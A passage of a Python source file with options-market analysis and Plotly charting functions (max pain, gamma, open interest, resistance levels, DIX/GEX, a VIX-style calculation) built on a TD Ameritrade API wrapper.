'putCall']).sum().sort_values(by='max_pain_value').reset_index()[['putCall','und_price', 'max_pain_value']]\n rdf = df_4\n return rdf\n\ndef graph_max_pain(tda_api, symbol, date):#, minrange, maxrange):\n\n curr_unix = time.time()\n curr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\n dayofweek = curr_dt.weekday()\n\n while dayofweek not in [0,1,2,3,4]:\n curr_unix -= 86400\n curr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\n dayofweek = curr_dt.weekday()\n\n last_trading_day = datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d')\n# print(last_trading_day)\n payload = {'frequency':1, 'frequencyType':'daily', 'needExtendedHoursData':'false'}\n payload['periodType']='month'\n\n sdfpull = tda_api.get_price_history(symbol, payload)\n sdf = pd.DataFrame(sdfpull['candles'])\n\n # hl2 = round(((max(0,int(sdf['low'].min()))) + (int(sdf['high'].max()*1.01)))/2)\n minrange=max(0,int(sdf['low'].min()*0.99))\n maxrange=int(sdf['high'].max()*1.01)\n # minrange = hl2 - 250\n # maxrange = hl2 + 250\n\n\n temp_df = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':date, 'toDate':date})\n\n plotdf = calc_max_pain_graph(temp_df, min_range=minrange, max_range=maxrange)\n\n fig = go.Figure()\n\n colormap = {'PUT':'red', 'CALL':'green'}\n\n for tn in plotdf['putCall'].unique():\n gdf = plotdf.loc[plotdf['putCall']==tn]\n\n bar_graph = go.Bar(\n x = gdf['und_price'],\n y = gdf['max_pain_value'],\n marker_color=colormap[tn],\n opacity=0.5,\n name=str(tn)\n )\n\n fig.add_trace(bar_graph)\n\n\n fig.update_layout({'xaxis':{'title': 'Underlying Price'},# 'range':[200,330]},\n 'yaxis':{'title': 'Writer Loss'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n\n mp = plotdf.groupby('und_price').sum().sort_values(by='max_pain_value').reset_index().at[0,'und_price']\n\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n fig.update_layout(title='Max Pain for {sym} {exp} --> {mp}'.format(mp=mp, sym=symbol, exp=date), title_y = 0.95, title_x=0.5, title_font_size=30)\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\n\ndef graph_gamma(tda_api, symbol, date, volume_cuttoff=100, pclimit=1000):\n\n df_ = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':date, 'toDate':date})\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n plot_df = df_#.loc[(tdf['strikePrice']>=250) & (tdf['strikePrice']<=310)]# & (tdf['totalVolume']>500)]\n plot_df = plot_df.loc[plot_df['totalVolume']>=volume_cuttoff]\n plot_df2 = plot_df.loc[(plot_df['percentChange']<=pclimit) & (plot_df['percentChange']>=(-1*pclimit))]\n\n colormap = {'PUT':'red', 'CALL':'green'}\n colormap2 = {'PUT':'palevioletred', 'CALL':'lightgreen'}\n\n# plot_df['hlchange'] = ((plot_df['highPrice'] - plot_df['lowPrice']) / plot_df['lowPrice'])*100\n# plot_df['hcchange'] = ((plot_df['highPrice'] - plot_df['closePrice']) / plot_df['closePrice'])*100\n# plot_df['lcchange'] = ((plot_df['lowPrice'] - plot_df['closePrice']) / plot_df['closePrice'])*100\n\n for tn in plot_df['putCall'].unique():\n gdf = plot_df.loc[plot_df['putCall']==tn]\n\n # Put metrics are fucked up, lets just look at total number of contracrts on the bar\n actual_line2 = go.Scatter(\n x=gdf['strikePrice'],\n y=gdf['gamma'],\n text=gdf['strikePrice'],\n mode='lines+markers',\n line=dict(color=colormap2[tn]),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'},\n 'symbol':3\n },\n name=str(tn)+' gamma',\n )\n fig.add_trace(actual_line2,secondary_y = True)\n\n for tn in plot_df['putCall'].unique():\n gdf = plot_df2.loc[plot_df2['putCall']==tn]\n\n actual_line = go.Scatter(\n x=gdf['strikePrice'],\n y=gdf['percentChange'],\n text=gdf['strikePrice'],\n mode='lines+markers',\n line=dict(color=colormap[tn]),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name='% Change {}'.format(tn),\n )\n\n fig.add_trace(actual_line,secondary_y = False)\n\n# actual_line = go.Scatter(\n# x=gdf['strikePrice'],\n# y=gdf['lcchange'],\n# text=gdf['strikePrice'],\n# mode='lines+markers',\n# line=dict(color=colormap[tn]),\n# opacity=0.3,\n# marker={\n# 'size': 5,\n# 'line': {'width': 0.5, 'color': 'white'}\n# },\n# name='% Change Low-Close {}'.format(tn),\n# )\n\n# fig.add_trace(actual_line,secondary_y = False)\n\n# actual_line = go.Scatter(\n# x=gdf['strikePrice'],\n# y=gdf['hlchange'],\n# text=gdf['strikePrice'],\n# mode='lines+markers',\n# line=dict(color=colormap[tn]),\n# visible='legendonly',\n# opacity=0.3,\n# marker={\n# 'size': 5,\n# 'line': {'width': 0.5, 'color': 'white'}\n# },\n# name='% Change High-Low {}'.format(tn),\n# )\n\n# fig.add_trace(actual_line,secondary_y = False)\n\n# actual_line = go.Scatter(\n# x=gdf['strikePrice'],\n# y=gdf['hcchange'],\n# text=gdf['strikePrice'],\n# mode='lines+markers',\n# line=dict(color=colormap[tn]),\n# visible='legendonly',\n# opacity=0.3,\n# marker={\n# 'size': 5,\n# 'line': {'width': 0.5, 'color': 'white'}\n# },\n# name='% Change High-Close {}'.format(tn),\n# )\n\n# fig.add_trace(actual_line,secondary_y = False)\n\n # bar_graph = go.Bar(\n # x = gdf['strikePrice'],\n # y = gdf['numberOfContracts'],\n # marker_color=colormap[tn],\n # opacity=0.3,\n # name='Volume {}'.format(tn)\n # )\n\n # fig.add_trace(bar_graph,secondary_y = True)\n\n fig.update_layout({'xaxis':{'title': 'Strike Price'},\n 'yaxis':{'title': '% Change (%)'},\n 'yaxis2' : {'title':'Gamma'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n fig.update_layout(title='% Change and Gamma for {sym} {date}'.format(sym=symbol, date=date), title_y = 1, title_x=0.5, title_font_size=30)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef plot_spx_resistance(df, resistance_lvls, plot_res=True):\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n candles = go.Candlestick(x=df['date'],\n open=df['open'],\n high=df['high'],\n low=df['low'],\n close=df['close'],\n name=df.at[0,'symbol'])\n\n fig.add_trace(candles,secondary_y = False)\n\n colors = ['red', 'orange', 'gold', 'lawngreen', 'lightseagreen', 'royalblue',\n 'blueviolet']\n clr_idx = 0\n\n xmin=df['date'].min()\n xmax=df['date'].max()\n\n if (plot_res==True) or (plot_res=='True'):\n for res in resistance_lvls:\n if (res < df['low'].min()-50) or (res > df['high'].max()+50):\n continue\n clr = colors[clr_idx%7]\n fig.add_shape(\n # Line Horizontal\n type=\"line\",\n x0=xmin,\n y0=res,\n x1=xmax,\n y1=res,\n opacity=0.5,\n name=str(res),\n line=dict(\n color=clr,\n width=2.5,\n ),\n )\n clr_idx += 1\n\n yaxis_min = df.loc[df['low']>0]['low'].min()*0.997\n yaxis_max = df['high'].max()*1.003\n\n fig.update_layout(legend_orientation=\"h\", height=1000, xaxis={'title':'date', 'type':'category'}, yaxis={'title':'Price ($)', 'range':[yaxis_min,yaxis_max]})\n fig.update_layout(legend=dict(x=-.1, y=1.2))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef get_resistance_lvls(tda_api, d1, d2, sym='$SPX.X', frequencyType='minute', frequency=1, nn=5, plot_res=True):\n\n df = get_historical_stock_data(tda_api, sym, d1, d2, frequencyType=frequencyType, frequency=frequency, ext_hours='false')\n\n\n dflows = df.loc[df['change']<=0]\n dfhighs = df.loc[df['change']>0]\n\n nn = 5\n\n dlist = []\n for lows in [3, 5, 15]:\n dflows['lows'] = dflows['low'].rolling(lows).min()\n vals = dflows.groupby('lows').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['lows'].values\n cnt = dflows.groupby('lows').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['open'].values\n for i in range(nn):\n d = {'vals':vals[i], 'cnt':cnt[i]}\n dlist.append(d)\n low_df = pd.DataFrame(dlist)\n\n dlist = []\n for highs in [3, 5, 15]:\n dfhighs['highs'] = dfhighs['high'].rolling(highs).max()\n vals = dfhighs.groupby('highs').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['highs'].values\n cnt = dfhighs.groupby('highs').count().sort_values(by='open',ascending=False).reset_index()[0:nn]['open'].values\n for i in range(nn):\n d = {'vals':vals[i], 'cnt':cnt[i]}\n dlist.append(d)\n high_df = pd.DataFrame(dlist)\n\n\n round_num = df['change'].apply(lambda x: abs(x)).mean() + (2*df['change'].std())\n res_df = pd.concat([high_df,low_df],ignore_index=True)\n res_df['round_val'] = res_df['vals'].apply(lambda x: math.floor(x/round_num)*round_num)\n res_vals = res_df.sort_values(by='vals').drop_duplicates(subset=['round_val'])['vals'].values\n\n spxdf = get_historical_stock_data(tda_api, sym, d1, d2,frequencyType='minute', frequency=1, ext_hours='false')\n\n g = plot_spx_resistance(spxdf, res_vals, plot_res=plot_res)\n\n return g\n\ndef pull_all_symbols(tda_api):\n\n ## Special cases\n # $SPX.X\n # $NDX.X\n # $RUT.X\n # $VIX.X\n data_pull = tda_api.get_symbols('[A-Z]*')\n df = pd.DataFrame(data_pull)\n df2 = df.T\n df3 = df2.loc[df2['exchange']!='Pink Sheet']\n\n syms = list(df3['symbol'].unique())\n for s in ['$NDX.X', '$RUT.X', '$VIX.X', '$SPX.X']:\n syms.append(s)\n\n return syms\n\ndef calc_strike_diff(k, S, putCall, round_num=1):\n\n r = None\n\n if putCall == 'PUT':\n r = S - k\n r = round(r/round_num)*round_num\n if putCall == 'CALL':\n r = k-S\n r = round(r/round_num)*round_num\n return r\n\ndef get_even_option_strike(input_df):\n\n df2 = input_df.copy()\n df2 = df2.pivot(index='strikePrice', columns='putCall', values='ask').dropna().reset_index()\n df2['pc_diff'] = abs(df2['CALL'] - df2['PUT'])\n df2['underlyingPrice'] = round(input_df.at[0,'underlyingPrice'], 2)\n df2 = df2.loc[(df2['CALL']>0) & (df2['PUT']>0)]\n df2 = df2.sort_values(by='pc_diff').reset_index(drop=True)\n\n return df2.at[0,'strikePrice']\n\ndef assemble_pc_df(input_df, lim=200, round_num=5):\n\n df = input_df.copy()\n# print(df.shape)\n even_ask_strike = get_even_option_strike(df)\n# return even_ask_strike\n\n df['strike_diff'] = df.apply(lambda row: calc_strike_diff(row['strikePrice'], row['underlyingPrice'], row['putCall'], round_num=round_num),axis=1)\n df = df.loc[(df['strike_diff']>=(lim*-1)) & (df['strike_diff']<=lim)].reset_index(drop=True)\n\n# print(df.shape)\n df2 = df.sort_values(by='totalVolume',ascending=False)\n df2 = df2[['putCall', 'strikePrice', 'mark', 'strike_diff']].copy()\n df2 = df2.drop_duplicates(subset=['putCall','strike_diff'])\n# print(df2.shape)\n\n\n df2 = df2.pivot(index='strike_diff', columns='putCall', values='mark').dropna().reset_index()\n df2['pc_diff'] = df2['CALL'] - df2['PUT']\n df2['underlyingPrice'] = round(df.at[0,'underlyingPrice']/round_num)*round_num\n df2['even_ask_strike'] = even_ask_strike\n\n return df2\n\ndef find_closest_priced_option(input_df):\n\n df = input_df.copy()\n\n und_price = df.at[0,'underlyingPrice']\n\n closest_call_list = []\n closest_put_list = []\n\n for i in range(df.shape[0]):\n\n current_call_price = df.at[i, 'CALL']\n current_put_price = df.at[i, 'PUT']\n\n temp_df = df.copy()\n temp_df['closest_call'] = abs(temp_df['CALL'] - current_put_price)\n temp_df['closest_put'] = abs(temp_df['PUT'] - current_call_price)\n\n closest_put = temp_df.sort_values(by='closest_put').reset_index(drop=True).at[0,'strike_diff']\n closest_call = temp_df.sort_values(by='closest_call').reset_index(drop=True).at[0,'strike_diff']\n\n closest_call_list.append(closest_call)\n closest_put_list.append(closest_put)\n\n df['closest_call_to_put_price'] = closest_call_list\n df['closest_put_to_call_price'] = closest_put_list\n\n df['strike_where_put_equals_this_strike_call'] = und_price - df['closest_put_to_call_price']\n df['strike_where_call_equals_this_strike_put'] = df['closest_call_to_put_price'] + und_price\n\n df['closest_diff'] = df['strike_where_put_equals_this_strike_call'] - df['strike_where_call_equals_this_strike_put']\n\n return df\n\n\ndef pull_spx_options(tda_api, d1, d2, sym='$SPX.X', lim=200, round_num=5):\n\n spx_df = tda_api.get_option_chain_df({'symbol':sym, 'fromDate':d1,'toDate':d2, 'range':'ALL'})\n\n final_spx_df = pd.DataFrame()\n\n for exp in spx_df['expirationDate'].unique():\n temp_df = spx_df.loc[spx_df['expirationDate']==exp].reset_index(drop=True)\n temp_df2 = assemble_pc_df(temp_df, lim=lim, round_num=round_num)\n temp_df3 = find_closest_priced_option(temp_df2)\n temp_df3['expirationDate'] = exp\n final_spx_df = pd.concat([final_spx_df, temp_df3],ignore_index=True)\n\n final_spx_df['expirationDate'] = pd.to_datetime(final_spx_df['expirationDate'], unit='ms')\n final_spx_df['expirationDate'] = final_spx_df['expirationDate'].apply(lambda x: str(x)[0:10])\n\n final_spx_df['put_strike'] = final_spx_df['underlyingPrice'] - final_spx_df['strike_diff']\n final_spx_df['call_strike'] = final_spx_df['underlyingPrice'] + final_spx_df['strike_diff']\n final_spx_df['strike_strings'] = final_spx_df.apply(lambda row: combine_strikes(row['put_strike'], row['call_strike']),axis=1)\n\n return final_spx_df\n\ndef combine_strikes(put_strike, call_strike):\n\n put_strike = str(put_strike)\n call_strike = str(call_strike)\n new_string = 'PUT STRIKE: {p} -- CALL STRIKE: {c}'.format(p=put_strike, c=call_strike)\n return new_string\n\ndef plot_SPX_options(input_df, sym, req_strikes=None):\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n df = input_df.copy()\n df = df.sort_values(by=['expirationDate', 'strike_diff'])\n\n if req_strikes!=None:\n df = df.loc[df['expirationDate'].isin(req_strikes)]\n\n for d in df['expirationDate'].unique():\n\n try:\n gdf = df.loc[df['expirationDate']==d].reset_index(drop=True)\n except:\n continue\n\n actual_line = go.Scatter(\n x=gdf['strike_diff'],\n y=gdf['pc_diff'],\n text=gdf['strike_strings'],\n mode='lines+markers',\n # line=dict(color='lime'),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name=d,\n legendgroup=d,\n )\n\n fig.add_trace(actual_line,secondary_y = False)\n\n\n fig.update_layout(legend_orientation=\"h\", height=1000, xaxis={'title':'$ Out of the Money'}, yaxis={'title':'Call Price - Put Price'}, title={'text':'{} Put Call price differences over equivelant strikes'.format(sym)})\n fig.update_layout(legend=dict(x=-.1, y=1.2))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef plot_SPX_options_3d(input_df):\n\n df = input_df.copy()\n\n fig = go.Figure()\n\n x = df['strike_diff']\n y = df['expirationDate']\n z = df['pc_diff']\n\n data=go.Scatter3d(\n x=x,\n y=y,\n z=z,\n text=df['closest_diff'],\n mode='markers',\n marker=dict(\n size=10,\n color=z,\n opacity=0.8,\n colorscale='Viridis',\n symbol='circle'\n )\n )\n\n fig.add_trace(data)\n\n # tight layout\n fig.update_layout(scene = dict(\n xaxis_title='$ Out of the Money',\n yaxis_title='Expiration Date',\n zaxis_title='call Price - Put Price'),\n height=1000,margin=dict(l=0, r=0, b=0, t=0), showlegend=True,\n )\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef graph_options_oi(tda_api, symbol, start_date, end_date, stack_bars=False):\n\n df_ = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':start_date, 'toDate':end_date})\n df_ = df_.groupby(['strikePrice','putCall'],as_index=False).sum()\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n colormap = {'PUT':'red', 'CALL':'green'}\n\n for tn in df_['putCall'].unique():\n gdf = df_.loc[df_['putCall']==tn]\n\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['openInterest'],\n marker_color=colormap[tn],\n opacity=0.5,\n name='Open Interest {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = False)\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['totalVolume'],\n marker_color=colormap[tn],\n opacity=0.3,\n name='Volume {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n\n fig.update_layout({'xaxis':{'title': 'Strike Price'},# 'range':[200,330]},\n 'yaxis':{'title': 'Open Interest'},\n 'yaxis2' : {'title':'Volume'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n if stack_bars == 'True':\n fig.update_layout(barmode='stack')\n\n fig.update_layout(title='Options for {sym} from ExpDate {d1} to {d2}'.format(sym=symbol, d1=start_date, d2=end_date), title_y = 0.95, title_x=0.5, title_font_size=30)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n # fig.update_layout(barmode='stack')\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef pull_dix():\n\n r = requests.get('https://squeezemetrics.com/monitor/static/DIX.csv?_t={}'.format(round(time.time()*1000)))\n\n cols = ['date','price','dix','gex']\n r2 = r.text[20:].replace('\\r\\n', ',').split(',')\n r2 = r2[:-1]\n temp_idx = cols*int(len(r2)/4)\n ddf = pd.DataFrame(r2, index=temp_idx)\n\n\n idx_str = ''\n for i in range(int(len(r2)/4)):\n idx_str += '{i},{i},{i},{i},'.format(i=i)\n idx_str = idx_str[:-1]\n r2_idx = idx_str.split(',')\n r2_idx = [int(i) for i in r2_idx]\n\n\n ddf2 = ddf.reset_index().pivot(columns='index', index=r2_idx)\n ddf2.columns = ddf2.columns.droplevel()\n for col in ['dix', 'gex', 'price']:\n ddf2[col] = ddf2[col].astype('float')\n\n return ddf2\n\nfrom sklearn.preprocessing import MinMaxScaler\n\ndef plot_dix(min_date, dix_rolling=None, gex_rolling=None):\n\n df = pull_dix()\n\n df = df.loc[df['date']>=min_date].reset_index(drop=True)\n\n mms = MinMaxScaler((df['gex'].min(), df['gex'].max()))\n\n if gex_rolling != None:\n df['gex'] = df['gex'].rolling(gex_rolling).mean()\n if dix_rolling != None:\n df['dix'] = df['dix'].rolling(dix_rolling).mean()\n\n df['dix_scaled'] = mms.fit_transform(df['dix'].values.reshape(-1,1))\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n\n\n fig.add_trace(go.Scatter(x=df['date'], y=df['price'],\n line=dict(color=\"#63e686\", width=5),\n name='SPX'),\n secondary_y=False)\n fig.add_trace(go.Scatter(x=df['date'], y=df['dix_scaled'],\n line=dict(color=\"#2eb9ff\", width=5),\n hovertext=df['dix'],\n name='DIX'),\n secondary_y=True)\n fig.add_trace(go.Scatter(x=df['date'], y=df['gex'],\n line=dict(color=\"#ffb62e\", width=5),\n name='GEX'),\n secondary_y=True)\n\n fig.update_layout(legend_orientation=\"h\", height=1000, title={'text':'Daily DIX & GEX'},xaxis={'title':'date'}, yaxis={'title':'SPX ($)'}, yaxis2={'title':'GEX'})\n fig.update_layout(legend=dict(x=-.1, y=1.2))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\n\n################## VIX CALC CODE ##################\ndef find_closest_midpoints(input_df):\n\n df = input_df.copy()\n\n df1 = df[['putCall', 'expirationDateStr', 'strikePrice', 'mark', 'bid', 'ask']]\n\n put_df = df1.loc[df1['putCall']=='PUT'][['expirationDateStr', 'strikePrice', 'mark', 'bid', 'ask']]\n call_df = df1.loc[df1['putCall']=='CALL'][['expirationDateStr', 'strikePrice', 'mark', 'bid', 'ask']]\n\n put_df.columns = ['expirationDateStr', 'strikePrice', 'put_mark', 'put_bid', 'put_ask']\n call_df.columns = ['expirationDateStr', 'strikePrice', 'call_mark', 'call_bid', 'call_ask']\n\n df2 = put_df.merge(call_df, on=['expirationDateStr', 'strikePrice'])\n\n closest_df = df2.copy()\n bidask_df = df2[['expirationDateStr', 'strikePrice', 'put_bid', 'put_ask', 'call_bid', 'call_ask']].copy()\n\n closest_df['diff'] = closest_df['put_mark'] - df2['call_mark']\n closest_df['diff'] = closest_df['diff'].apply(lambda x: abs(x))\n closest_df = closest_df.loc[(closest_df['put_mark']>0) & (closest_df['call_mark']>0)]\n closest_df = closest_df.sort_values(by='diff')\n closest_df = closest_df.drop_duplicates(subset='expirationDateStr')\n\n df3 = closest_df[['expirationDateStr', 'strikePrice', 'diff']]\n df3.columns = ['expirationDateStr', 'closest_strikes', 'closest_diff']\n\n df3 = df3.sort_values(by='expirationDateStr')\n\n rdf = input_df.merge(df3, on='expirationDateStr',how='left')\n\n rdf = rdf.merge(bidask_df, on=['expirationDateStr', 'strikePrice'], how='left')\n\n return rdf\n\ndef filter_bids(input_df):\n\n df = input_df.copy()\n\n # First, filter out based on the midpoints\n df = df.sort_values(by=['expirationDateStr','putCall', 'strikePrice'])\n\n put_df = df.loc[(df['putCall']=='PUT')]\n call_df = df.loc[(df['putCall']=='CALL')]\n put_df = put_df.sort_values(by='strikePrice',ascending=False)\n call_df = call_df.sort_values(by='strikePrice')\n df = pd.concat([put_df,call_df])\n\n df['lag_bid'] = df.groupby(['expirationDateStr','putCall'])['bid'].shift()\n df['bidsum1'] = df['bid'] + df['lag_bid']\n\n put_df = df.loc[(df['putCall']=='PUT') & (df['strikePrice']<=df['closest_strikes'])]\n call_df = df.loc[(df['putCall']=='CALL') & (df['strikePrice']>=df['closest_strikes'])]\n\n put_df = put_df.sort_values(by='strikePrice',ascending=False)\n call_df = call_df.sort_values(by='strikePrice')\n\n df = pd.concat([put_df,call_df])\n\n df['bidprod'] = df.groupby(['expirationDateStr','putCall'])['bidsum1'].cumprod()\n\n # Exclude options with bids = 0\n df2 = df.loc[df['bid']>0]\n # Exclude all options after 2 0 bids in a row\n df2 = df2.loc[df2['bidprod']!=0]\n\n ## Now apply prices to each options - special case for those that are == spot price\n\n rdf1 = df2.loc[df2['strikePrice']!=df2['closest_strikes']]\n rdf11 = rdf1.loc[rdf1['putCall']=='PUT']\n rdf12 = rdf1.loc[rdf1['putCall']=='CALL']\n\n rdf2 = df2.loc[df2['strikePrice']==df2['closest_strikes']]\n\n\n rdf11['Q'] = (rdf11['put_bid'] + rdf11['put_ask'] ) / 2\n rdf12['Q'] = (rdf12['call_bid'] + rdf12['call_ask'] ) / 2\n\n rdf2['Q'] = (rdf2['call_bid'] + rdf2['call_ask'] + rdf2['put_bid'] + rdf2['put_ask'] ) / 4\n\n rdf = pd.concat([rdf11, rdf12, rdf2],ignore_index=True)\n\n # Define Minutes to exp\n rdf['mte_calc'] = rdf['dte_calc']*24*60\n rdf['T'] = rdf['mte_calc']/ 525600 # minutes in a year\n\n return rdf\n\ndef calc_VIX(input_df, r=0.00067):\n\n df = input_df.copy()\n\n df = df.loc[df['strikePrice']==df['closest_strikes']].sort_values(by=['expirationDateStr', 'putCall']).reset_index(drop=True)\n\n start_exp = df.at[0,'expirationDateStr']\n end_exp = df.at[df.shape[0]-1, 'expirationDateStr']\n\n df = df.loc[df['expirationDateStr'].isin([start_exp, end_exp])].reset_index(drop=True)\n df['baa'] = (df['bid'] + df['ask'] ) / 2\n\n # Now calc it!\n p1 = df.at[1,'baa']\n c1 = df.at[0,'baa']\n\n p2 = df.at[3,'baa']\n c2 = df.at[2,'baa']\n\n T1 = df.at[1,'T']\n T2 = df.at[3,'T']\n\n k1 = df.at[1,'closest_strikes']\n k2 = df.at[3,'closest_strikes']\n\n F1 = k1 + (math.exp(r*T1) * (c1-p1))\n F2 = k2 + (math.exp(r*T2) * (c2-p2))\n\n ## Now we need to calc the variance\n df2 = input_df.copy()\n df2 = df2.loc[df2['expirationDateStr'].isin([start_exp, end_exp])].sort_values(by='strikePrice')\n # To get the delta X, forward and lag variables\n df2['lag_strike'] = df2.groupby(['expirationDateStr','putCall'])['strikePrice'].shift()\n df2['forward_strike'] = df2.groupby(['expirationDateStr','putCall'])['strikePrice'].shift(-1)\n\n df2['deltaX'] = abs(df2['forward_strike'] - df2['lag_strike']) / 2\n\n df2 = df2.sort_values(by=['expirationDateStr','putCall', 'strikePrice']).reset_index(drop=True)\n df2['deltaX'] = df2['deltaX'].interpolate(method='pad') # Fill in nans with \"closest adjectent strike\" which...will probably be whatever it was near it\n df2['deltaX'] = df2['deltaX'].bfill()\n\n # Make columns to help with sum term\n df2['strikes_sq'] = df2['strikePrice'].apply(lambda x: x**2)\n df2['sth1'] = (df2['deltaX'] / df2['strikes_sq']) * df2['Q']\n df2['sth1'] = df2['sth1'] * math.exp(r * T1)\n df2['sth2'] = df2['sth1'] * math.exp(r * T2)\n\n ndf = df2.loc[df2['expirationDateStr']==start_exp]\n fdf = df2.loc[df2['expirationDateStr']==end_exp]\n\n st1 = ndf['sth1'].sum()\n st2 = fdf['sth2'].sum()\n\n nt_k0 = ndf['closest_strikes'].values[0]\n ft_k0 = fdf['closest_strikes'].values[0]\n\n fterm1 = (((F1 / nt_k0) - 1 ) ** 2) * (1/T1)\n fterm2 = (((F2 / ft_k0) - 1 ) ** 2) * (1/T2)\n\n sterm1 = (2/T1) * st1\n sterm2 = (2/T2) * st2\n\n var1 = sterm1 - fterm1\n var2 = sterm2 - fterm2\n\n\n # df2['sum_term1'] = st1# Sum term - deltaX, X, Qx\n # df2['sum_term2'] = st2\n\n # df2['fterm1'] = (F1 / df2['closest_strikes']) - 1\n # df2['fterm1'] = df2['fterm1'].apply(lambda x: x**2)\n # df2['fterm1'] = df2['fterm1'] * (1/T1)\n\n # df2['fterm2'] = (F2 / df2['closest_strikes']) - 1\n # df2['fterm2'] = df2['fterm2'].apply(lambda x: x**2)\n # df2['fterm2'] = df2['fterm2'] * (1/T2)\n\n # df2['sterm1'] = (2/T1) * df2['sum_term1'] * math.exp(r * T1)\n # df2['sterm2'] = (2/T2) * df2['sum_term2'] * math.exp(r * T2)\n\n # df2['var1'] = df2['sterm1'] - df2['fterm1']\n # df2['var2'] = df2['sterm2'] - df2['fterm2']\n\n # var1 = df2.loc[df2['expirationDateStr']==start_exp]['var1'].values[0]\n # var2 = df2.loc[df2['expirationDateStr']==end_exp]['var2'].values[0]\n\n # Just put the last term here...too tired to do it right now\n N1 = df.at[0,'mte_calc']\n N2 = df.at[2, 'mte_calc']\n\n N30 = 43200 # Number of minutes in 30 days\n N365 = 525600 # Number of minutes in a year\n # print(var1, var2)\n\n\n vix1 = (T1 * var1 * ( (N2-N30) / (N2-N1)))\n vix2 = (T2 * var2 * ( (N30-N1) / (N2-N1)))\n vix3 = (vix1 + vix2) * (N365/N30)\n\n VIX = 100 * (vix3**0.5)\n\n # print(vix1, vix2)\n # print(VIX)\n\n return VIX\n\ndef get_VIX(tda_api, neardate=None, fardate=None):\n\n if neardate==None:\n neardate = datetime.datetime.now() + datetime.timedelta(days=24)\n dow = neardate.weekday()\n while dow != 4:\n neardate = neardate + datetime.timedelta(days=1)\n dow = neardate.weekday()\n\n if fardate==None:\n if type(neardate)==str:\n neardate = datetime.datetime.strptime(neardate, '%Y-%m-%d')\n fardate = neardate + datetime.timedelta(days=7)\n\n neardate_str = str(neardate)[0:10]\n fardate_str = str(fardate)[0:10]\n\n df = tda_api.get_option_chain_df({'symbol':'$SPX.X', 'fromDate':neardate_str,'toDate':fardate_str})\n\n # Make sure we only include weeklys and not the AM expirations\n df['spx_symbol'] = df['symbol'].apply(lambda x: x[0:4])\n df = df.loc[df['expirationDateStr'].isin([neardate_str, fardate_str])]\n df = df.loc[df['spx_symbol']=='SPXW']\n df = df.reset_index(drop=True)\n\n df2 = find_closest_midpoints(df)\n df3 = filter_bids(df2)\n df4 = calc_VIX(df3)\n\n return df4\n\ndef dash_vix_values(tda_api):\n\n\n neardate = datetime.datetime.now() + datetime.timedelta(days=24)\n dow = neardate.weekday()\n while dow != 4:\n neardate = neardate + datetime.timedelta(days=1)\n dow = neardate.weekday()\n\n if type(neardate)==str:\n neardate = datetime.datetime.strptime(neardate, '%Y-%m-%d')\n fardate = neardate + datetime.timedelta(days=7)\n\n neardate0 = neardate + datetime.timedelta(days=-7)\n fardate0 = fardate + datetime.timedelta(days=-7)\n\n neardate2 = neardate + datetime.timedelta(days=7)\n fardate2 = fardate + datetime.timedelta(days=7)\n\n neardate_str = str(neardate)[0:10]\n fardate_str = str(fardate)[0:10]\n\n neardate_str0 = str(neardate0)[0:10]\n fardate_str0 = str(fardate0)[0:10]\n\n neardate_str2 = str(neardate2)[0:10]\n fardate_str2 = str(fardate2)[0:10]\n\n vix0 = round(get_VIX(tda_api, neardate=neardate0, fardate=fardate0), 3)\n vix1 = round(get_VIX(tda_api, neardate=neardate, fardate=fardate), 3)\n vix2 = round(get_VIX(tda_api, neardate=neardate2, fardate=fardate2), 3)\n\n r0 = [neardate_str0, fardate_str0, vix0]\n r1 = [neardate_str, fardate_str, vix1]\n r2 = [neardate_str2, fardate_str2, vix2]\n\n rdict = [r0, r1, r2]\n\n return rdict\n\n\n################## END VIX CALC CODE ##################\n\n\n################## START VOLATILITY TERM-STRUCTURE CODE ##################\ndef pullCalendarIVdf(tda_api, sym, start_dt, end_dt, filter_fd=False):\n\n df = tda_api.get_option_chain_df({'symbol':sym, 